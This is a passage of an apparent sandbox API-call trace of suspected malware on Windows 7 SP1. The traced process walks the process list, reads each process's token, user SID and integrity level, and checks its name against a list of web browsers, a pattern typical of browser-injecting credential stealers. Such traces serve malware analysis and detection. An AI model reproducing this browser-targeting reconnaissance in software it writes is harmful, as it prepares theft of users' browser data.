TokenInformation=0x238ef88, TokenInformationLength=0x24, ReturnLength=0x275fc44 | out: TokenInformation=0x238ef88, ReturnLength=0x275fc44) returned 1 [0323.423] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0xc, TokenInformation=0x275fc74, TokenInformationLength=0x4, ReturnLength=0x275fc58 | out: TokenInformation=0x275fc74, ReturnLength=0x275fc58) returned 1 [0323.423] CloseHandle (hObject=0x66c) returned 1 [0323.423] CloseHandle (hObject=0x5b0) returned 1 [0323.423] GetLengthSid (pSid=0x238ef90*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0323.423] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6fc) returned 0x5b0 [0323.423] GetVersionExW (in: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x247d10, dwBuildNumber=0x3e50f0, dwPlatformId=0x0, szCSDVersion="\x0f\x08@") | out: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0323.423] OpenProcessToken (in: ProcessHandle=0x5b0, DesiredAccess=0x20008, TokenHandle=0x275fc74 | out: TokenHandle=0x275fc74*=0x66c) returned 1 [0323.423] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc70 | out: TokenInformation=0x0, ReturnLength=0x275fc70) returned 0 [0323.423] GetLastError () returned 0x7a [0323.423] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x19, TokenInformation=0x238eda8, TokenInformationLength=0x14, ReturnLength=0x275fc70 | out: TokenInformation=0x238eda8, ReturnLength=0x275fc70) returned 1 [0323.423] GetSidSubAuthorityCount (pSid=0x238edb0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x238edb1 [0323.423] GetSidSubAuthority (pSid=0x238edb0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x238edb8 [0323.423] CloseHandle (hObject=0x66c) returned 1 [0323.423] CloseHandle (hObject=0x5b0) returned 1 [0323.423] lstrcmpiW (lpString1="firefox.exe", lpString2="reader_sl.exe") returned -1 [0323.423] lstrcmpiW (lpString1="chrome.exe", lpString2="reader_sl.exe") returned -1 [0323.423] lstrcmpiW (lpString1="opera.exe", lpString2="reader_sl.exe") returned -1 [0323.423] lstrcmpiW (lpString1="iexplore.exe", lpString2="reader_sl.exe") returned -1 [0323.423] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="reader_sl.exe") returned -1 [0323.423] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="reader_sl.exe") returned -1 [0323.423] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f8) returned 0x5b0 [0323.424] OpenProcessToken (in: ProcessHandle=0x5b0, DesiredAccess=0x8, TokenHandle=0x275fc5c | out: TokenHandle=0x275fc5c*=0x66c) returned 1 [0323.424] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc44 | out: TokenInformation=0x0, ReturnLength=0x275fc44) returned 0 [0323.424] GetLastError () returned 0x7a [0323.424] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x1, TokenInformation=0x238ef88, TokenInformationLength=0x24, ReturnLength=0x275fc44 | out: TokenInformation=0x238ef88, ReturnLength=0x275fc44) returned 1 [0323.424] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0xc, TokenInformation=0x275fc74, TokenInformationLength=0x4, ReturnLength=0x275fc58 | out: TokenInformation=0x275fc74, ReturnLength=0x275fc58) returned 1 [0323.424] CloseHandle (hObject=0x66c) returned 1 [0323.424] CloseHandle (hObject=0x5b0) returned 1 [0323.424] GetLengthSid (pSid=0x238ef90*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0323.424] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f8) returned 0x5b0 [0323.424] GetVersionExW (in: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x247ea8, dwBuildNumber=0x3e50f0, dwPlatformId=0x0, szCSDVersion="\x0f\x08A") | out: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0323.424] OpenProcessToken (in: ProcessHandle=0x5b0, DesiredAccess=0x20008, TokenHandle=0x275fc74 | out: TokenHandle=0x275fc74*=0x66c) returned 1 [0323.424] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc70 | out: TokenInformation=0x0, ReturnLength=0x275fc70) returned 0 [0323.424] GetLastError () returned 0x7a [0323.424] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x19, TokenInformation=0x238eda8, TokenInformationLength=0x14, ReturnLength=0x275fc70 | out: TokenInformation=0x238eda8, ReturnLength=0x275fc70) returned 1 [0323.424] GetSidSubAuthorityCount (pSid=0x238edb0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x238edb1 [0323.424] GetSidSubAuthority (pSid=0x238edb0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x238edb8 [0323.424] CloseHandle (hObject=0x66c) returned 1 [0323.424] CloseHandle (hObject=0x5b0) returned 1 [0323.424] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0323.424] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0323.424] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0323.424] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0323.424] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0323.424] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0323.424] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x594) returned 0x5b0 [0323.424] OpenProcessToken (in: ProcessHandle=0x5b0, DesiredAccess=0x8, TokenHandle=0x275fc5c | out: TokenHandle=0x275fc5c*=0x66c) returned 1 [0323.424] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc44 | out: TokenInformation=0x0, ReturnLength=0x275fc44) returned 0 [0323.424] GetLastError () returned 0x7a [0323.424] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x1, TokenInformation=0x238ef88, TokenInformationLength=0x24, ReturnLength=0x275fc44 | out: TokenInformation=0x238ef88, ReturnLength=0x275fc44) returned 1 [0323.424] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0xc, TokenInformation=0x275fc74, TokenInformationLength=0x4, ReturnLength=0x275fc58 | out: TokenInformation=0x275fc74, ReturnLength=0x275fc58) returned 1 [0323.424] CloseHandle (hObject=0x66c) returned 1 [0323.425] CloseHandle (hObject=0x5b0) returned 1 [0323.425] GetLengthSid (pSid=0x238ef90*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0323.425] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x594) returned 0x5b0 [0323.425] GetVersionExW (in: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x248690, dwBuildNumber=0x3e50f0, dwPlatformId=0x0, szCSDVersion="\x0f\x08B") | out: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0323.425] OpenProcessToken (in: ProcessHandle=0x5b0, DesiredAccess=0x20008, TokenHandle=0x275fc74 | out: TokenHandle=0x275fc74*=0x66c) returned 1 [0323.425] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc70 | out: TokenInformation=0x0, ReturnLength=0x275fc70) returned 0 [0323.425] GetLastError () returned 0x7a [0323.425] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x19, TokenInformation=0x238eda8, TokenInformationLength=0x14, ReturnLength=0x275fc70 | out: TokenInformation=0x238eda8, ReturnLength=0x275fc70) returned 1 [0323.425] GetSidSubAuthorityCount (pSid=0x238edb0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x238edb1 [0323.425] GetSidSubAuthority (pSid=0x238edb0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x238edb8 [0323.425] CloseHandle (hObject=0x66c) returned 1 [0323.425] CloseHandle (hObject=0x5b0) returned 1 [0323.425] lstrcmpiW (lpString1="firefox.exe", lpString2="upde25b4796.exe") returned -1 [0323.425] lstrcmpiW (lpString1="chrome.exe", lpString2="upde25b4796.exe") returned -1 [0323.425] lstrcmpiW (lpString1="opera.exe", lpString2="upde25b4796.exe") returned -1 [0323.425] lstrcmpiW (lpString1="iexplore.exe", lpString2="upde25b4796.exe") returned -1 [0323.425] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="upde25b4796.exe") returned -1 [0323.425] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="upde25b4796.exe") returned -1 [0323.425] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x57c) returned 0x0 [0323.425] VirtualFree (lpAddress=0x240000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0323.426] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0325.426] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x275fc94 | out: SystemInformation=0x0, ResultLength=0x275fc94*=0xaf50) returned 0xc0000004 [0325.427] VirtualAlloc (lpAddress=0x0, dwSize=0xbf50, flAllocationType=0x1000, flProtect=0x4) returned 0x240000 [0325.428] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x240000, Length=0xbf50, ResultLength=0x0 | out: SystemInformation=0x240000, ResultLength=0x0) returned 0x0 [0325.429] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0325.429] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0325.429] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0325.430] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0325.430] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0325.430] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0325.430] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0325.430] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0325.430] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0325.430] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0325.430] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0325.431] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0325.431] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c4) returned 0x0 [0325.431] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x32c) returned 0x0 [0325.431] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x358) returned 0x0 [0325.431] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x39c) returned 0x0 [0325.431] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3e8) returned 0x0 [0325.431] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0 [0325.431] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x304) returned 0x0 [0325.432] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x43c) returned 0x0 [0325.432] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x5b0 [0325.432] OpenProcessToken (in: ProcessHandle=0x5b0, DesiredAccess=0x8, TokenHandle=0x275fc5c | out: TokenHandle=0x275fc5c*=0x66c) returned 1 [0325.432] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc44 | out: TokenInformation=0x0, ReturnLength=0x275fc44) returned 0 [0325.432] GetLastError () returned 0x7a [0325.432] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x1, TokenInformation=0x238ef88, TokenInformationLength=0x24, ReturnLength=0x275fc44 | out: TokenInformation=0x238ef88, ReturnLength=0x275fc44) returned 1 [0325.432] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0xc, TokenInformation=0x275fc74, TokenInformationLength=0x4, ReturnLength=0x275fc58 | out: TokenInformation=0x275fc74, ReturnLength=0x275fc58) returned 1 [0325.433] CloseHandle (hObject=0x66c) returned 1 [0325.433] CloseHandle (hObject=0x5b0) returned 1 [0325.433] GetLengthSid (pSid=0x238ef90*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0325.433] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x5b0 [0325.433] GetVersionExW (in: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x2487a0, dwBuildNumber=0x3e50f0, dwPlatformId=0x0, szCSDVersion="\x0f\x08C") | out: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0325.433] OpenProcessToken (in: ProcessHandle=0x5b0, DesiredAccess=0x20008, TokenHandle=0x275fc74 | out: TokenHandle=0x275fc74*=0x66c) returned 1 [0325.434] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc70 | out: TokenInformation=0x0, ReturnLength=0x275fc70) returned 0 [0325.434] GetLastError () returned 0x7a [0325.434] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x19, TokenInformation=0x238eda8, TokenInformationLength=0x14, ReturnLength=0x275fc70 | out: TokenInformation=0x238eda8, ReturnLength=0x275fc70) returned 1 [0325.434] GetSidSubAuthorityCount (pSid=0x238edb0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x238edb1 [0325.434] GetSidSubAuthority (pSid=0x238edb0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x238edb8 [0325.434] CloseHandle (hObject=0x66c) returned 1 [0325.434] CloseHandle (hObject=0x5b0) returned 1 [0325.435] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0325.435] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0325.435] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0325.436] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0325.436] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0325.436] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0325.436] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4f0) returned 0x0 [0325.436] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x5b0 [0325.436] OpenProcessToken (in: ProcessHandle=0x5b0, DesiredAccess=0x8, TokenHandle=0x275fc5c | out: TokenHandle=0x275fc5c*=0x66c) returned 1 [0325.436] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc44 | out: TokenInformation=0x0, ReturnLength=0x275fc44) returned 0 [0325.436] GetLastError () returned 0x7a [0325.436] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x1, TokenInformation=0x238ef88, TokenInformationLength=0x24, ReturnLength=0x275fc44 | out: TokenInformation=0x238ef88, ReturnLength=0x275fc44) returned 1 [0325.436] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0xc, TokenInformation=0x275fc74, TokenInformationLength=0x4, ReturnLength=0x275fc58 | out: TokenInformation=0x275fc74, ReturnLength=0x275fc58) returned 1 [0325.437] CloseHandle (hObject=0x66c) returned 1 [0325.437] CloseHandle (hObject=0x5b0) returned 1 [0325.437] GetLengthSid (pSid=0x238ef90*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0325.437] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x5b0 [0325.437] GetVersionExW (in: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x246920, dwBuildNumber=0x3e50f0, dwPlatformId=0x0, szCSDVersion="\x0f\x08D") | out: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0325.437] OpenProcessToken (in: ProcessHandle=0x5b0, DesiredAccess=0x20008, TokenHandle=0x275fc74 | out: TokenHandle=0x275fc74*=0x66c) returned 1 [0325.437] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc70 | out: TokenInformation=0x0, ReturnLength=0x275fc70) returned 0 [0325.437] GetLastError () returned 0x7a [0325.437] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x19, TokenInformation=0x238eda8, TokenInformationLength=0x14, ReturnLength=0x275fc70 | out: TokenInformation=0x238eda8, ReturnLength=0x275fc70) returned 1 [0325.438] GetSidSubAuthorityCount (pSid=0x238edb0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x238edb1 [0325.438] GetSidSubAuthority (pSid=0x238edb0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x238edb8 [0325.438] CloseHandle (hObject=0x66c) returned 1 [0325.438] CloseHandle (hObject=0x5b0) returned 1 [0325.439] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0325.439] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0325.439] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0325.439] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0325.439] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0325.439] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0325.439] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x5b0 [0325.440] OpenProcessToken (in: ProcessHandle=0x5b0, DesiredAccess=0x8, TokenHandle=0x275fc5c | out: TokenHandle=0x275fc5c*=0x66c) returned 1 [0325.440] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc44 | out: TokenInformation=0x0, ReturnLength=0x275fc44) returned 0 [0325.440] GetLastError () returned 0x7a [0325.440] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x1, TokenInformation=0x238ef88, TokenInformationLength=0x24, ReturnLength=0x275fc44 | out: TokenInformation=0x238ef88, ReturnLength=0x275fc44) returned 1 [0325.440] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0xc, TokenInformation=0x275fc74, TokenInformationLength=0x4, ReturnLength=0x275fc58 | out: TokenInformation=0x275fc74, ReturnLength=0x275fc58) returned 1 [0325.440] CloseHandle (hObject=0x66c) returned 1 [0325.440] CloseHandle (hObject=0x5b0) returned 1 [0325.440] GetLengthSid (pSid=0x238ef90*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0325.440] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x5b0 [0325.441] GetVersionExW (in: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x247020, dwBuildNumber=0x3e50f0, dwPlatformId=0x0, szCSDVersion="\x0f\x08E") | out: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0325.441] OpenProcessToken (in: ProcessHandle=0x5b0, DesiredAccess=0x20008, TokenHandle=0x275fc74 | out: TokenHandle=0x275fc74*=0x66c) returned 1 [0325.441] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc70 | out: TokenInformation=0x0, ReturnLength=0x275fc70) returned 0 [0325.441] GetLastError () returned 0x7a [0325.441] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x19, TokenInformation=0x238eda8, TokenInformationLength=0x14, ReturnLength=0x275fc70 | out: TokenInformation=0x238eda8, ReturnLength=0x275fc70) returned 1 [0325.441] GetSidSubAuthorityCount (pSid=0x238edb0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x238edb1 [0325.441] GetSidSubAuthority (pSid=0x238edb0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x238edb8 [0325.441] CloseHandle (hObject=0x66c) returned 1 [0325.441] CloseHandle (hObject=0x5b0) returned 1 [0325.442] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0325.442] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0325.442] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0325.442] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0325.442] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0325.442] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0325.443] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0325.443] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x5b0 [0325.443] OpenProcessToken (in: ProcessHandle=0x5b0, DesiredAccess=0x8, TokenHandle=0x275fc5c | out: TokenHandle=0x275fc5c*=0x66c) returned 1 [0325.443] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc44 | out: TokenInformation=0x0, ReturnLength=0x275fc44) returned 0 [0325.443] GetLastError () returned 0x7a [0325.443] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x1, TokenInformation=0x238ef88, TokenInformationLength=0x24, ReturnLength=0x275fc44 | out: TokenInformation=0x238ef88, ReturnLength=0x275fc44) returned 1 [0325.443] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0xc, TokenInformation=0x275fc74, TokenInformationLength=0x4, ReturnLength=0x275fc58 | out: TokenInformation=0x275fc74, ReturnLength=0x275fc58) returned 1 [0325.443] CloseHandle (hObject=0x66c) returned 1 [0325.443] CloseHandle (hObject=0x5b0) returned 1 [0325.444] GetLengthSid (pSid=0x238ef90*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0325.444] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x5b0 [0325.444] GetVersionExW (in: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x247928, dwBuildNumber=0x3e50f0, dwPlatformId=0x0, szCSDVersion="\x0f\x08F") | out: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0325.444] OpenProcessToken (in: ProcessHandle=0x5b0, DesiredAccess=0x20008, TokenHandle=0x275fc74 | out: TokenHandle=0x275fc74*=0x66c) returned 1 [0325.444] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc70 | out: TokenInformation=0x0, ReturnLength=0x275fc70) returned 0 [0325.444] GetLastError () returned 0x7a [0325.444] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x19, TokenInformation=0x238eda8, TokenInformationLength=0x14, ReturnLength=0x275fc70 | out: TokenInformation=0x238eda8, ReturnLength=0x275fc70) returned 1 [0325.444] GetSidSubAuthorityCount (pSid=0x238edb0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x238edb1 [0325.444] GetSidSubAuthority (pSid=0x238edb0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x238edb8 [0325.444] CloseHandle (hObject=0x66c) returned 1 [0325.445] CloseHandle (hObject=0x5b0) returned 1 